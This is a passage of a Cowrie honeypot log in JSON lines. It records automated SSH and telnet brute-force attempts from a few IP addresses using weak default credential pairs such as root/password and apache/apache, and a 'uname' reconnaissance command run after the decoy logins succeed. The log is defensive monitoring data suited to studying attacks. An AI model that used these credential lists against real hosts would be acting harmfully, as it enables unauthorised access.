{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45194,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ae2f003cc04","protocol":"ssh","message":"New connection: 212.227.235.229:45194 (1.2.3.4:22) [session: 6ae2f003cc04]","sensor":"my-vps","timestamp":"2025-08-28T06:26:16.472027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:26:16.472953Z","src_ip":"212.227.235.229","session":"6ae2f003cc04"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:26:16.726347Z","src_ip":"212.227.235.229","session":"6ae2f003cc04"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:26:17.488742Z","src_ip":"212.227.235.229","session":"6ae2f003cc04"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:18.744716Z","src_ip":"212.227.235.229","session":"6ae2f003cc04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34330,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9177c33bd24","protocol":"telnet","message":"New connection: 212.227.125.160:34330 (1.2.3.4:23) [session: d9177c33bd24]","sensor":"my-vps","timestamp":"2025-08-28T06:26:24.104848Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47126,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dd5e33df8a0","protocol":"ssh","message":"New connection: 212.227.125.160:47126 (1.2.3.4:22) [session: 0dd5e33df8a0]","sensor":"my-vps","timestamp":"2025-08-28T06:26:26.087868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:26:26.093964Z","src_ip":"212.227.125.160","session":"0dd5e33df8a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:26:26.321243Z","src_ip":"212.227.125.160","session":"0dd5e33df8a0"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:26:27.236058Z","src_ip":"212.227.125.160","session":"0dd5e33df8a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:26:27.850369Z","src_ip":"212.227.125.160","session":"0dd5e33df8a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:26:27.851367Z","src_ip":"212.227.125.160","session":"0dd5e33df8a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:28.081968Z","src_ip":"212.227.125.160","session":"0dd5e33df8a0"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:28.083291Z","src_ip":"212.227.125.160","session":"0dd5e33df8a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57486,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f1d2dabe93d","protocol":"ssh","message":"New connection: 212.227.235.229:57486 (1.2.3.4:22) [session: 5f1d2dabe93d]","sensor":"my-vps","timestamp":"2025-08-28T06:26:32.965568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:26:32.966594Z","src_ip":"212.227.235.229","session":"5f1d2dabe93d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:26:33.230268Z","src_ip":"212.227.235.229","session":"5f1d2dabe93d"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:26:34.023845Z","src_ip":"212.227.235.229","session":"5f1d2dabe93d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:26:34.570564Z","src_ip":"212.227.235.229","session":"5f1d2dabe93d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:26:34.571395Z","src_ip":"212.227.235.229","session":"5f1d2dabe93d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:34.837048Z","src_ip":"212.227.235.229","session":"5f1d2dabe93d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:34.838631Z","src_ip":"212.227.235.229","session":"5f1d2dabe93d"}
{"eventid":"cowrie.session.closed","duration":31.43225383758545,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:35.914557Z","src_ip":"8.222.212.69","session":"442cff4e669d"}
{"eventid":"cowrie.session.closed","duration":14.177307367324829,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:38.282060Z","src_ip":"212.227.125.160","session":"d9177c33bd24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54670,"dst_ip":"1.2.3.4","dst_port":22,"session":"f359933dd1fe","protocol":"ssh","message":"New connection: 212.227.125.160:54670 (1.2.3.4:22) [session: f359933dd1fe]","sensor":"my-vps","timestamp":"2025-08-28T06:26:42.817952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:26:42.848472Z","src_ip":"212.227.125.160","session":"f359933dd1fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:26:43.048149Z","src_ip":"212.227.125.160","session":"f359933dd1fe"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-28T06:26:43.943760Z","src_ip":"212.227.125.160","session":"f359933dd1fe"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:45.168996Z","src_ip":"212.227.125.160","session":"f359933dd1fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34572,"dst_ip":"1.2.3.4","dst_port":22,"session":"adc1054036d2","protocol":"ssh","message":"New connection: 212.227.235.229:34572 (1.2.3.4:22) [session: adc1054036d2]","sensor":"my-vps","timestamp":"2025-08-28T06:26:49.479646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:26:49.480447Z","src_ip":"212.227.235.229","session":"adc1054036d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:26:49.725616Z","src_ip":"212.227.235.229","session":"adc1054036d2"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-28T06:26:50.478942Z","src_ip":"212.227.235.229","session":"adc1054036d2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:51.726258Z","src_ip":"212.227.235.229","session":"adc1054036d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55428,"dst_ip":"1.2.3.4","dst_port":22,"session":"d432f8cafb99","protocol":"ssh","message":"New connection: 212.227.125.160:55428 (1.2.3.4:22) [session: d432f8cafb99]","sensor":"my-vps","timestamp":"2025-08-28T06:26:59.324201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:26:59.326850Z","src_ip":"212.227.125.160","session":"d432f8cafb99"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:26:59.543397Z","src_ip":"212.227.125.160","session":"d432f8cafb99"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-28T06:27:00.947613Z","src_ip":"212.227.125.160","session":"d432f8cafb99"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:02.168226Z","src_ip":"212.227.125.160","session":"d432f8cafb99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52820,"dst_ip":"1.2.3.4","dst_port":22,"session":"87851698e4d8","protocol":"ssh","message":"New connection: 212.227.235.229:52820 (1.2.3.4:22) [session: 87851698e4d8]","sensor":"my-vps","timestamp":"2025-08-28T06:27:06.058920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:27:06.060135Z","src_ip":"212.227.235.229","session":"87851698e4d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:27:06.313134Z","src_ip":"212.227.235.229","session":"87851698e4d8"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-28T06:27:07.074934Z","src_ip":"212.227.235.229","session":"87851698e4d8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:08.329026Z","src_ip":"212.227.235.229","session":"87851698e4d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47038,"dst_ip":"1.2.3.4","dst_port":22,"session":"103c3f2d9878","protocol":"ssh","message":"New connection: 212.227.125.160:47038 (1.2.3.4:22) [session: 103c3f2d9878]","sensor":"my-vps","timestamp":"2025-08-28T06:27:15.892944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:27:15.911669Z","src_ip":"212.227.125.160","session":"103c3f2d9878"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:27:16.123128Z","src_ip":"212.227.125.160","session":"103c3f2d9878"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:27:17.044327Z","src_ip":"212.227.125.160","session":"103c3f2d9878"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:27:17.644698Z","src_ip":"212.227.125.160","session":"103c3f2d9878"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:27:17.645568Z","src_ip":"212.227.125.160","session":"103c3f2d9878"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:17.876384Z","src_ip":"212.227.125.160","session":"103c3f2d9878"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:17.877560Z","src_ip":"212.227.125.160","session":"103c3f2d9878"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46854,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4d5dfd60dd5","protocol":"ssh","message":"New connection: 212.227.235.229:46854 (1.2.3.4:22) [session: c4d5dfd60dd5]","sensor":"my-vps","timestamp":"2025-08-28T06:27:22.607876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:27:22.608787Z","src_ip":"212.227.235.229","session":"c4d5dfd60dd5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac